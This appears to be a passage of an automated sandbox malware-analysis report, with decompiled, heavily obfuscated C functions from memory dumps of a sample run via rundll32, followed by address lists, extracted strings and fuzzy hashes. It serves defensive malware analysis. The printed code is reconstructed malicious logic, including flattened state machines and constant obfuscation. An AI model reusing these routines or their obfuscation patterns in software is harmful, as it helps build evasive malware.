							_t160 = E00201196(_v572, _t193, _v612,  &_v556, _v588);
							_t196 =  &(_t196[3]);
							goto L8;
						} else {
							if(_t166 == 0x2f406389) {
								return E001F78F0(_t193, _v592, _v576, _v568, _v600);
							}
							if(_t166 != 0x34204f7e) {
								L16:
								if(_t166 != 0x27ada575) {
									continue;
								} else {
									return _t160;
								}
							} else {
								_v556 = 0x22c;
								_t160 = E001FC951(_v564, _t193, _v580, _v604,  &_v556, _v596);
								_t196 =  &(_t196[4]);
								L8:
								asm("sbb ecx, ecx");
								_t166 = ( ~_t160 & 0xd7924461) + 0x2f406389;
								continue;
							}
						}
						L19:
						return _t160;
					}
					_push(_t166);
					_push(_t166);
					_t160 = E001F34DF(_v608);
					_t193 = _t160;
					if(_t160 != 0xffffffff) {
						_t166 = 0x34204f7e;
						continue;
					}
					goto L19;
				}
				_push(_t188);
				_push( &_v556);
				if(_a4() == 0) {
					_t166 = 0x2f406389;
					goto L16;
				} else {
					_t166 = 0x184d4ecd;
					goto L1;
				}
				goto L19;
			}

0x002042ec
0x002042f3
0x002042f5
0x002042fc
0x00204303
0x00204305
0x0020430a
0x00204312
0x00204315
0x0020431c
0x00204321
0x00204326
0x0020432e
0x00204336
0x0020433b
0x00204343
0x0020434b
0x00204353
0x0020435b
0x0020436a
0x0020436d
0x00204371
0x00204376
0x0020437e
0x0020438e
0x00204392
0x0020439c
0x0020439f
0x002043a3
0x002043ab
0x002043b3
0x002043b8
0x002043c0
0x002043c8
0x002043d0
0x002043d8
0x002043e0
0x002043e8
0x002043f8
0x002043fc
0x00204408
0x0020440d
0x00204413
0x0020441b
0x00204427
0x0020442a
0x0020442e
0x00204436
0x0020443e
0x00204446
0x0020444e
0x0020445b
0x0020445f
0x00204467
0x0020446f
0x00204477
0x0020447f
0x00204487
0x00204494
0x002044a1
0x002044a9
0x002044b3
0x002044b7
0x002044c0
0x002044c4
0x002044cc
0x002044d9
0x002044dd
0x002044e2
0x002044e7
0x00000000
0x002044ef
0x00204501
0x002045a1
0x00000000
0x002045a1
0x00204509
0x00204511
0x00204571
0x00204576
0x00000000
0x00204513
0x00204515
0x00000000
0x002045ea
0x00204521
0x002045c5
0x002045cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00204527
0x0020452f
0x00204546
0x0020454b
0x0020454e
0x00204552
0x0020455a
0x00000000
0x0020455a
0x00204521
0x002045f7
0x002045f7
0x002045f7
0x00204587
0x00204588
0x00204589
0x0020458e
0x00204595
0x00204597
0x00000000
0x00204597
0x00000000
0x00204595
0x002045a8
0x002045ad
0x002045b7
0x002045c3
0x00000000
0x002045b9
0x002045b9
0x00000000
0x002045b9
0x00000000

Strings

;Mu, xrefs: 0020433B
MD, xrefs: 00204353
e|, xrefs: 002044C4
~O 4, xrefs: 00204597
yA, xrefs: 0020444E
~O 4, xrefs: 0020451B
&, xrefs: 002044CC
TK, xrefs: 002043D0

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;Mu$MD$TK$e|$yA$~O 4$~O 4$&
API String ID: 0-3555957702
Opcode ID: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
Instruction ID: bb89c8e72da92ff18f0417049677c2945ac72aad98f59bf2774e92deeb278ac2
Opcode Fuzzy Hash: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
Instruction Fuzzy Hash: 387176B11193029FC368DF22D94991FBBF1EBD4708F40891DF695962A0D7758A19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002A3856, Relevance: 10.2, Strings: 8, Instructions: 177COMMON

Download Yara Rule

Strings

TK, xrefs: 002A3944
;Mu, xrefs: 002A38AF
&, xrefs: 002A3A40
~O 4, xrefs: 002A3B0B
yA, xrefs: 002A39C2
e|, xrefs: 002A3A38
~O 4, xrefs: 002A3A8F
MD, xrefs: 002A38C7

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;Mu$MD$TK$e|$yA$~O 4$~O 4$&
API String ID: 0-3555957702
Opcode ID: 657cb5a8c38b1aec9278b0551b0a677d8f611010371cc98726df6451c434982c
Instruction ID: 0e64d1dac28a020d693046a9caa3628c8ae2fbbf25e1c140aa008caefcb67295
Opcode Fuzzy Hash: 657cb5a8c38b1aec9278b0551b0a677d8f611010371cc98726df6451c434982c
Instruction Fuzzy Hash: 4A7185B15193029FC758CF26D98991FBBF1EBC4B08F00891DF596962A0C7B58A19CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00205AB8, Relevance: 10.2, Strings: 8, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00205AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t155;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t182;
				intOrPtr* _t198;
				void* _t199;
				signed int* _t202;

				_push(_a16);
				_t198 = _a12;
				_push(_t198);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t155);
				_v64 = 0xce72;
				_t202 =  &(( &_v68)[6]);
				_v64 = _v64 << 9;
				_t199 = 0;
				_t182 = 0xa327820;
				_t176 = 0x1c;
				_v64 = _v64 / _t176;
				_v64 = _v64 + 0xffff8abd;
				_v64 = _v64 ^ 0x000e49bc;
				_v8 = 0xd869;
				_v8 = _v8 + 0xb7;
				_v8 = _v8 ^ 0x0000d921;
				_v36 = 0xa5f6;
				_v36 = _v36 + 0xffff8ce6;
				_t177 = 0x14;
				_v36 = _v36 / _t177;
				_v36 = _v36 ^ 0x00004e2d;
				_v40 = 0xc3ca;
				_v40 = _v40 + 0x908a;
				_t178 = 0x63;
				_v40 = _v40 / _t178;
				_v40 = _v40 ^ 0x00006c32;
				_v44 = 0xe24;
				_v44 = _v44 << 7;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00f05026;
				_v24 = 0x7d7;
				_v24 = _v24 + 0xffffb711;
				_v24 = _v24 ^ 0xffffb7a2;
				_v48 = 0x8d07;
				_v48 = _v48 + 0xfffff854;
				_v48 = _v48 + 0xffffd8f0;
				_v48 = _v48 ^ 0x00001ba2;
				_v68 = 0x8813;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0x19ce;
				_v68 = _v68 << 6;
				_v68 = _v68 ^ 0x0006522a;
				_v20 = 0x1e4f;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x003cb9d6;
				_v60 = 0xca0;
				_v60 = _v60 * 0x63;
				_v60 = _v60 ^ 0x63869485;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x1c13f119;
				_v28 = 0xf08e;
				_v28 = _v28 + 0x10ed;
				_v28 = _v28 + 0xa702;
				_v28 = _v28 ^ 0x0001ca56;
				_v52 = 0x57f8;
				_v52 = _v52 << 0xc;
				_v52 = _v52 >> 0xa;
				_t179 = 0x4c;
				_v52 = _v52 / _t179;
				_v52 = _v52 ^ 0x00006698;
				_v32 = 0xdab;
				_v32 = _v32 << 0xc;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x56475ce6;
				_v12 = 0xaec1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0000705e;
				_v16 = 0x4e43;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x001eb931;
				_v56 = 0x98b0;
				_v56 = _v56 + 0xe89c;
				_v56 = _v56 + 0xb4ee;
				_v56 = _v56 + 0xffffbf3b;
				_v56 = _v56 ^ 0x0001c98f;
				while(_t182 != 0xa327820) {
					if(_t182 == 0x239384b6) {
						E001F69FC( &_v4, _v28, _v52, _v32, _v8, _v12, _t182, _a8, _t199, _t182, _t182, _v16, _v56);
						 *_t198 = _v4;
					} else {
						if(_t182 == 0x352093e2) {
							_push(_t182);
							_t199 = E002057E8(_v4);
							if(_t199 != 0) {
								_t182 = 0x239384b6;
								continue;
							}
						} else {
							if(_t182 != 0x3a4d2a27) {
								L10:
								if(_t182 != 0x12c90a5a) {
									continue;
								} else {
								}
							} else {
								_t175 = E001F69FC( &_v4, _v36, _v40, _v44, _v64, _v24, _t182, _a8, 0, _t182, _t182, _v48, _v68);
								_t202 =  &(_t202[0xb]);
								if(_t175 != 0) {
									_t182 = 0x352093e2;
									continue;
								}
							}
						}
					}
					return _t199;
				}
				_t182 = 0x3a4d2a27;
				goto L10;
			}

0x00205abf
0x00205ac3
0x00205ac7
0x00205ac8
0x00205acc
0x00205ad0
0x00205ad1
0x00205ad2
0x00205ad7
0x00205adf
0x00205ae2
0x00205aed
0x00205aef
0x00205af6
0x00205afb
0x00205b01
0x00205b09
0x00205b11
0x00205b19
0x00205b21
0x00205b29
0x00205b31
0x00205b3d
0x00205b42
0x00205b48
0x00205b50
0x00205b58
0x00205b64
0x00205b67
0x00205b6b
0x00205b73
0x00205b7b
0x00205b85
0x00205b89
0x00205b91
0x00205b99
0x00205ba1
0x00205ba9
0x00205bb1
0x00205bb9
0x00205bc1
0x00205bc9
0x00205bd1
0x00205bd6
0x00205bde
0x00205be3
0x00205beb
0x00205bf3
0x00205bf8
0x00205c00
0x00205c0d
0x00205c11
0x00205c19
0x00205c1e
0x00205c26
0x00205c2e
0x00205c36
0x00205c3e
0x00205c46
0x00205c4e
0x00205c53
0x00205c60
0x00205c6d
0x00205c71
0x00205c79
0x00205c81
0x00205c8b
0x00205c8f
0x00205c97
0x00205c9f
0x00205ca4
0x00205cac
0x00205cb9
0x00205cbd
0x00205cc5
0x00205ccd
0x00205cd5
0x00205cdd
0x00205ce5
0x00205ced
0x00205cf7
0x00205d92
0x00205d9e
0x00205cf9
0x00205cfb
0x00205d46
0x00205d50
0x00205d55
0x00205d57
0x00000000
0x00205d57
0x00205cfd
0x00205d03
0x00205d60
0x00205d66
0x00000000
0x00000000
0x00205d68
0x00205d05
0x00205d2e
0x00205d33
0x00205d38
0x00205d3a
0x00000000
0x00205d3a
0x00205d38
0x00205d03
0x00205cfb
0x00205da9
0x00205da9
0x00205d5b
0x00000000

Strings

2l, xrefs: 00205B6B
\GV, xrefs: 00205C8F
^p, xrefs: 00205CA4
x2, xrefs: 00205AEF
'*M:, xrefs: 00205D5B
x2, xrefs: 00205CED
'*M:, xrefs: 00205CFD
CN, xrefs: 00205CAC

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: x2$ x2$'*M:$'*M:$2l$CN$^p$\GV
API String ID: 0-2340335227
Opcode ID: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
Instruction ID: ae1523fce0206ccd98229699f809638dfa25c249eeee24143bcdddd2aee67d85
Opcode Fuzzy Hash: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
Instruction Fuzzy Hash: 97714FB25083419FE354CF60C98991FBBE1FB98758F509A0DF2D5462A1D3B6C919CF82

Uniqueness

Uniqueness Score: -1.00%

Function 002A502C, Relevance: 10.2, Strings: 8, Instructions: 172COMMON

Download Yara Rule

Strings

^p, xrefs: 002A5218
'*M:, xrefs: 002A5271
CN, xrefs: 002A5220
\GV, xrefs: 002A5203
x2, xrefs: 002A5063
2l, xrefs: 002A50DF
'*M:, xrefs: 002A52CF
x2, xrefs: 002A5261

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: x2$ x2$'*M:$'*M:$2l$CN$^p$\GV
API String ID: 0-2340335227
Opcode ID: 03e2ec1033b53c61dc0acedec4e5a106d97db867496c063b5f183304e0811c7a
Instruction ID: e05ee5d4b8111045f85d6fe8191751e6560d50e230112e7a777099c2c0cf94d6
Opcode Fuzzy Hash: 03e2ec1033b53c61dc0acedec4e5a106d97db867496c063b5f183304e0811c7a
Instruction Fuzzy Hash: 1F714FB2109381AFE754CF60C98991FBBE1FB95B58F105A0CF2D5462A0D7B6C918CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00299DAD, Relevance: 10.1, Strings: 8, Instructions: 148COMMON

Download Yara Rule

Strings

zC, xrefs: 00299E54
yv, xrefs: 00299FB9
tR, xrefs: 00299EC4
:Z, xrefs: 00299EDA
x(, xrefs: 00299F48
7,, xrefs: 00299F12
h, xrefs: 00299F64
Z, xrefs: 00299DF0

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 7,$:Z$Z$tR$x($yv$zC$h
API String ID: 0-2636882195
Opcode ID: c7d8d978b758ec2997259056b9fc38ce0e0ded14932dbd8928f810f330442188
Instruction ID: fc086658bf2a7f4d607bd63ce52b1c5a024b1b1ec273ad2721addb28831213b3
Opcode Fuzzy Hash: c7d8d978b758ec2997259056b9fc38ce0e0ded14932dbd8928f810f330442188
Instruction Fuzzy Hash: 4371F0B1D00709DBEF58CFA9D98A5EEFBB1FB04318F208119D011BA1A0D7B95A45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 001F620A, Relevance: 9.1, Strings: 7, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001F620A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _t338;
				intOrPtr _t364;
				void* _t377;
				signed int _t380;
				intOrPtr _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr _t395;
				void* _t422;
				intOrPtr* _t430;
				signed int _t433;
				intOrPtr _t438;
				signed int* _t440;
				void* _t443;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t338);
				_v80 = 0xcc9d;
				_t440 =  &(( &_v168)[6]);
				_t386 = 0;
				_t433 = 0x16bff9b6;
				_t438 = 0;
				_t388 = 0x11;
				_v80 = _v80 / _t388;
				_v80 = _v80 + 0xffff11cc;
				_v80 = _v80 ^ 0xffff7c6a;
				_v44 = 0x1a06;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x00002b89;
				_v160 = 0x27c9;
				_v160 = _v160 >> 9;
				_v160 = _v160 << 7;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x0004f334;
				_v168 = 0x8961;
				_v168 = _v168 + 0x1e8b;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0xca952250;
				_v168 = _v168 ^ 0x6d795972;
				_v40 = 0xb8c6;
				_t389 = 0x25;
				_v40 = _v40 / _t389;
				_v40 = _v40 ^ 0x00002ddd;
				_v140 = 0xf458;
				_v140 = _v140 + 0x660b;
				_v140 = _v140 << 0xd;
				_t390 = 0x3b;
				_v140 = _v140 / _t390;
				_v140 = _v140 ^ 0x00bbd1d1;
				_v84 = 0x2cf9;
				_v84 = _v84 ^ 0xe2cb4fb4;
				_v84 = _v84 | 0x3d81796a;
				_v84 = _v84 ^ 0xffcb5ef8;
				_v156 = 0xe047;
				_v156 = _v156 + 0xec23;
				_v156 = _v156 | 0xc96a13e4;
				_v156 = _v156 ^ 0x1a962ea6;
				_v156 = _v156 ^ 0xd3fdba9b;
				_v108 = 0x4236;
				_v108 = _v108 >> 8;
				_v108 = _v108 + 0xffff4e26;
				_v108 = _v108 ^ 0xffff2512;
				_v24 = 0xcb45;
				_t391 = 0x77;
				_v24 = _v24 * 0xf;
				_v24 = _v24 ^ 0x000bb0ab;
				_v100 = 0xb258;
				_v100 = _v100 * 0x6b;
				_v100 = _v100 / _t391;
				_v100 = _v100 ^ 0x0000cac4;
				_v16 = 0xab6c;
				_v16 = _v16 + 0x630c;
				_v16 = _v16 ^ 0x0001587e;
				_v20 = 0xcdcd;
				_v20 = _v20 + 0xffff01ab;
				_v20 = _v20 ^ 0xfffff9e5;
				_v60 = 0xefa6;
				_t392 = 0x4c;
				_v60 = _v60 * 0x26;
				_v60 = _v60 ^ 0x0023a95c;
				_v112 = 0x9292;
				_v112 = _v112 + 0xffff5686;
				_v112 = _v112 / _t392;
				_v112 = _v112 ^ 0x035e352f;
				_v96 = 0x9b3d;
				_v96 = _v96 + 0xb399;
				_v96 = _v96 + 0xffffc9ce;
				_v96 = _v96 ^ 0x000113bb;
				_v152 = 0x851e;
				_v152 = _v152 + 0x4a3f;
				_v152 = _v152 | 0x2010aaec;
				_t393 = 0xa;
				_v152 = _v152 * 0x5f;
				_v152 = _v152 ^ 0xe64968ad;
				_v124 = 0x3cc7;
				_v124 = _v124 << 0xe;
				_v124 = _v124 + 0x9bc0;
				_v124 = _v124 ^ 0x0f321da8;
				_v116 = 0xd63e;
				_v116 = _v116 + 0x90bc;
				_v116 = _v116 * 0x13;
				_v116 = _v116 ^ 0x001aea95;
				_v32 = 0xbd6a;
				_v32 = _v32 | 0xd1e4c041;
				_v32 = _v32 ^ 0xd1e4a4ec;
				_v88 = 0xac52;
				_v88 = _v88 | 0x10312b45;
				_v88 = _v88 * 0x50;
				_v88 = _v88 ^ 0x0f86db5e;
				_v52 = 0xe981;
				_v52 = _v52 | 0xae117bb0;
				_v52 = _v52 ^ 0xae11932c;
				_v144 = 0x1dfb;
				_v144 = _v144 | 0x48b114e1;
				_v144 = _v144 + 0xfffff9cd;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x0916476d;
				_v56 = 0xf206;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00005f8d;
				_v92 = 0xe052;
				_v92 = _v92 + 0x2471;
				_v92 = _v92 + 0xffffdbed;
				_v92 = _v92 ^ 0x0000938e;
				_v68 = 0xe0f9;
				_v68 = _v68 * 0x31;
				_v68 = _v68 + 0xffff857e;
				_v68 = _v68 ^ 0x002a9bd7;
				_v48 = 0x94fa;
				_v48 = _v48 / _t393;
				_v48 = _v48 ^ 0x00004295;
				_v132 = 0xaea7;
				_v132 = _v132 | 0xc9193032;
				_v132 = _v132 ^ 0x9bfcaca0;
				_v132 = _v132 + 0xffff6354;
				_v132 = _v132 ^ 0x52e462fc;
				_v76 = 0xa7e3;
				_v76 = _v76 | 0xf0f94981;
				_v76 = _v76 + 0xffff9c41;
				_v76 = _v76 ^ 0xf0f9e006;
				_v164 = 0x36ff;
				_v164 = _v164 + 0xffff2d0d;
				_v164 = _v164 + 0x7fd2;
				_t394 = 0x7d;
				_v164 = _v164 * 0x77;
				_v164 = _v164 ^ 0xfff2f01d;
				_v120 = 0xc712;
				_v120 = _v120 | 0x5aa592ba;
				_v120 = _v120 + 0x46e1;
				_v120 = _v120 ^ 0x5aa67fba;
				_v28 = 0x86a8;
				_t395 = _v136;
				_v28 = _v28 / _t394;
				_v28 = _v28 ^ 0x0000629f;
				_v36 = 0xa6d4;
				_v36 = _v36 + 0xffffc65c;
				_v36 = _v36 ^ 0x00006d44;
				_v72 = 0x4693;
				_v72 = _v72 | 0x8261f221;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x0104c1d4;
				_v104 = 0x1547;
				_v104 = _v104 >> 9;
				_v104 = _v104 * 0x6e;
				_v104 = _v104 ^ 0x0000044d;
				_v148 = 0xcfb0;
				_v148 = _v148 >> 6;
				_v148 = _v148 | 0xbecf16fe;
				_v148 = _v148 ^ 0xbecf17ff;
				_v64 = 0x449d;
				_v64 = _v64 << 0xd;
				_v64 = _v64 * 0x30;
				_v64 = _v64 ^ 0x9bae0001;
				_t430 = _v12;
				while(1) {
					L1:
					_t364 = _v128;
					while(1) {
						_t422 = 0x1994d475;
						while(1) {
							L3:
							_t443 = _t433 - _t422;
							if(_t443 > 0) {
								goto L20;
							}
							L4:
							if(_t443 == 0) {
								E00205963(_a16, _v148, _t438, _v92, _v68);
								_t440 =  &(_t440[3]);
								goto L19;
							} else {
								if(_t433 == 0x18ba6df) {
									_t430 = _t430 + 0x2c;
									asm("sbb esi, esi");
									_t433 = (_t433 & 0x01739b49) + 0x4550e01;
									continue;
								} else {
									if(_t433 == 0x2f8e7bf) {
										_t377 = E00202249(_a12, _v40, _t395, _t395, _v140, _v84, _v156, _v108, _t386, _t395, _t395, _v24, _t395,  &_v12, _t395,  &_v8);
										_t440 =  &(_t440[0xe]);
										if(_t377 == 0) {
											L19:
											_t433 = 0x4550e01;
											goto L13;
										} else {
											_t380 = E00207B6B();
											_t433 = 0x5c8a94a;
											_t364 = _v12 * 0x2c + _t386;
											_v128 = _t364;
											_t430 =  >=  ? _t386 : (_t380 & 0x0000001f) * 0x2c + _t386;
											goto L14;
										}
										L33:
										return _t364;
									} else {
										if(_t433 == 0x4550e01) {
											_t296 =  &_v48; // 0x6d44
											E001F91CD( *_t296, _v132, _v76, _t438, _v164);
											_t440 =  &(_t440[3]);
											_t433 = 0x2fd49dd4;
											L13:
											_t364 = _v128;
											L14:
											_t395 = _v136;
											_t422 = 0x1994d475;
											continue;
										} else {
											if(_t433 == 0x5c8a94a) {
												_t395 = E00207C1D(_v20, _v60, _a12,  *_t430, _v64, _v112);
												_t440 =  &(_t440[4]);
												_v136 = _t395;
												_t433 =  !=  ? 0x2d7fc8f5 : 0x18ba6df;
												goto L1;
											} else {
												if(_t433 == 0x16bff9b6) {
													_t433 = 0x1a134602;
													while(1) {
														L3:
														_t443 = _t433 - _t422;
														if(_t443 > 0) {
															goto L20;
														}
														goto L4;
													}
													goto L20;
												}
											}
										}
									}
								}
							}
							L30:
							if(_t433 != 0x399cbc9a) {
								_t364 = _v128;
								_t395 = _v136;
								continue;
							}
							goto L33;
							L20:
							if(_t433 == 0x1a134602) {
								_push(_t395);
								_t364 = E002057E8(0x20000);
								_t386 = _t364;
								if(_t386 == 0) {
									_t433 = 0x399cbc9a;
									goto L29;
								} else {
									_t433 = 0x34bb9491;
									goto L13;
								}
							} else {
								_t364 = 0x2d7fc8f5;
								if(_t433 == 0x2d7fc8f5) {
									E0020ECE3( &_v4, _v96, _v104, _v152, _t438, _v124, _t395, _t395, _v116, _v32);
									_t433 =  !=  ? 0x1994d475 : 0x18ba6df;
									_t364 = E0020F23C(_v88, _v136, _v52, _v144, _v56);
									_t440 =  &(_t440[0xb]);
									L29:
									_t422 = 0x1994d475;
								} else {
									if(_t433 == 0x2fd49dd4) {
										return E001F91CD(_v120, _v28, _v36, _t386, _v72);
									}
									if(_t433 == 0x34bb9491) {
										_push(_t395);
										_t438 = E002057E8(0x2000);
										_t433 =  !=  ? 0x2f8e7bf : 0x2fd49dd4;
										goto L13;
									}
								}
							}
							goto L30;
						}
					}
				}
			}

0x001f6214
0x001f621b
0x001f6222
0x001f6229
0x001f6230
0x001f6231
0x001f6232
0x001f6237
0x001f6242
0x001f624b
0x001f624d
0x001f6252
0x001f6256
0x001f625b
0x001f6261
0x001f6269
0x001f6271
0x001f627c
0x001f6283
0x001f628e
0x001f6296
0x001f629b
0x001f62a0
0x001f62a5
0x001f62ad
0x001f62b5
0x001f62bd
0x001f62c2
0x001f62ca
0x001f62d2
0x001f62e4
0x001f62e9
0x001f62f2
0x001f62fd
0x001f6305
0x001f630d
0x001f6316
0x001f631b
0x001f6321
0x001f6329
0x001f6331
0x001f6339
0x001f6341
0x001f6349
0x001f6351
0x001f6359
0x001f6361
0x001f6369
0x001f6371
0x001f6379
0x001f637e
0x001f6386
0x001f638e
0x001f63a1
0x001f63a2
0x001f63a9
0x001f63b4
0x001f63c1
0x001f63cb
0x001f63cf
0x001f63d9
0x001f63e4
0x001f63ef
0x001f63fa
0x001f6405
0x001f6410
0x001f641b
0x001f642a
0x001f642d
0x001f6434
0x001f643f
0x001f6447
0x001f6457
0x001f645b
0x001f6463
0x001f646b
0x001f6473
0x001f647b
0x001f6483
0x001f648b
0x001f6493
0x001f64a0
0x001f64a1
0x001f64a5
0x001f64ad
0x001f64b5
0x001f64ba
0x001f64c2
0x001f64ca
0x001f64d2
0x001f64df
0x001f64e3
0x001f64eb
0x001f64f6
0x001f6501
0x001f650c
0x001f6514
0x001f6521
0x001f6525
0x001f652d
0x001f6538
0x001f6543
0x001f654e
0x001f6556
0x001f655e
0x001f6566
0x001f656b
0x001f6573
0x001f657e
0x001f6586
0x001f6591
0x001f6599
0x001f65a1
0x001f65a9
0x001f65b1
0x001f65be
0x001f65c2
0x001f65ca
0x001f65d2
0x001f65e6
0x001f65ed
0x001f65f8
0x001f6600
0x001f6608
0x001f6610
0x001f6618
0x001f6620
0x001f6628
0x001f6632
0x001f663a
0x001f6642
0x001f664a
0x001f6652
0x001f6661
0x001f6662
0x001f6666
0x001f666e
0x001f6676
0x001f667e
0x001f6686
0x001f668e
0x001f66a2
0x001f66a6
0x001f66ad
0x001f66b8
0x001f66c3
0x001f66ce
0x001f66d9
0x001f66e1
0x001f66e9
0x001f66ee
0x001f66f6
0x001f66fe
0x001f6708
0x001f670c
0x001f6714
0x001f671c
0x001f6721
0x001f6729
0x001f6731
0x001f6739
0x001f6743
0x001f6747
0x001f674f
0x001f6756
0x001f6756
0x001f6756
0x001f675a
0x001f675a
0x001f675f
0x001f675f
0x001f675f
0x001f6761
0x00000000
0x00000000
0x001f6767
0x001f6767
0x001f68c3
0x001f68c8
0x00000000
0x001f676d
0x001f6773
0x001f6897
0x001f689c
0x001f68a4
0x00000000
0x001f6779
0x001f677f
0x001f6856
0x001f685b
0x001f6860
0x001f68cb
0x001f68cb
0x00000000
0x001f6862
0x001f686d
0x001f6875
0x001f6887
0x001f688b
0x001f688f
0x00000000
0x001f688f
0x001f69fb
0x001f69fb
0x001f6785
0x001f678b
0x001f67f6
0x001f67fd
0x001f6802
0x001f6805
0x001f680a
0x001f680a
0x001f680e
0x001f680e
0x001f675a
0x00000000
0x001f678d
0x001f6793
0x001f67cc
0x001f67ce
0x001f67d3
0x001f67e1
0x00000000
0x001f6795
0x001f679b
0x001f67a1
0x001f675f
0x001f675f
0x001f675f
0x001f6761
0x00000000
0x00000000
0x00000000
0x001f6761
0x00000000
0x001f675f
0x001f679b
0x001f6793
0x001f678b
0x001f677f
0x001f6773
0x001f69bd
0x001f69c3
0x001f69c5
0x001f69c9
0x00000000
0x001f69c9
0x00000000
0x001f68d5
0x001f68db
0x001f6997
0x001f699d
0x001f69a2
0x001f69a7
0x001f69b3
0x00000000
0x001f69a9
0x001f69a9
0x00000000
0x001f69a9
0x001f68e1
0x001f68e1
0x001f68e8
0x001f6951
0x001f697f
0x001f6982
0x001f6987
0x001f69b8
0x001f69b8
0x001f68ea
0x001f68f0
0x00000000
0x001f69ee
0x001f68fc
0x001f690a
0x001f6915
0x001f6924
0x00000000
0x001f6924
0x001f68fc
0x001f68e8
0x00000000
0x001f68db
0x001f675f
0x001f675a

Strings

q$, xrefs: 001F6599
?J, xrefs: 001F648B
rYym, xrefs: 001F62CA
#, xrefs: 001F6351
F, xrefs: 001F667E
6B, xrefs: 001F6371
Dmw, xrefs: 001F67F6

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$6B$?J$Dmw$q$$rYym$F
API String ID: 0-3531653112
Opcode ID: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
Instruction ID: 3a8711580cd280d26ad805e6f5263e5f85d5847c4f2ad3798ef1d67e5d88bc1e
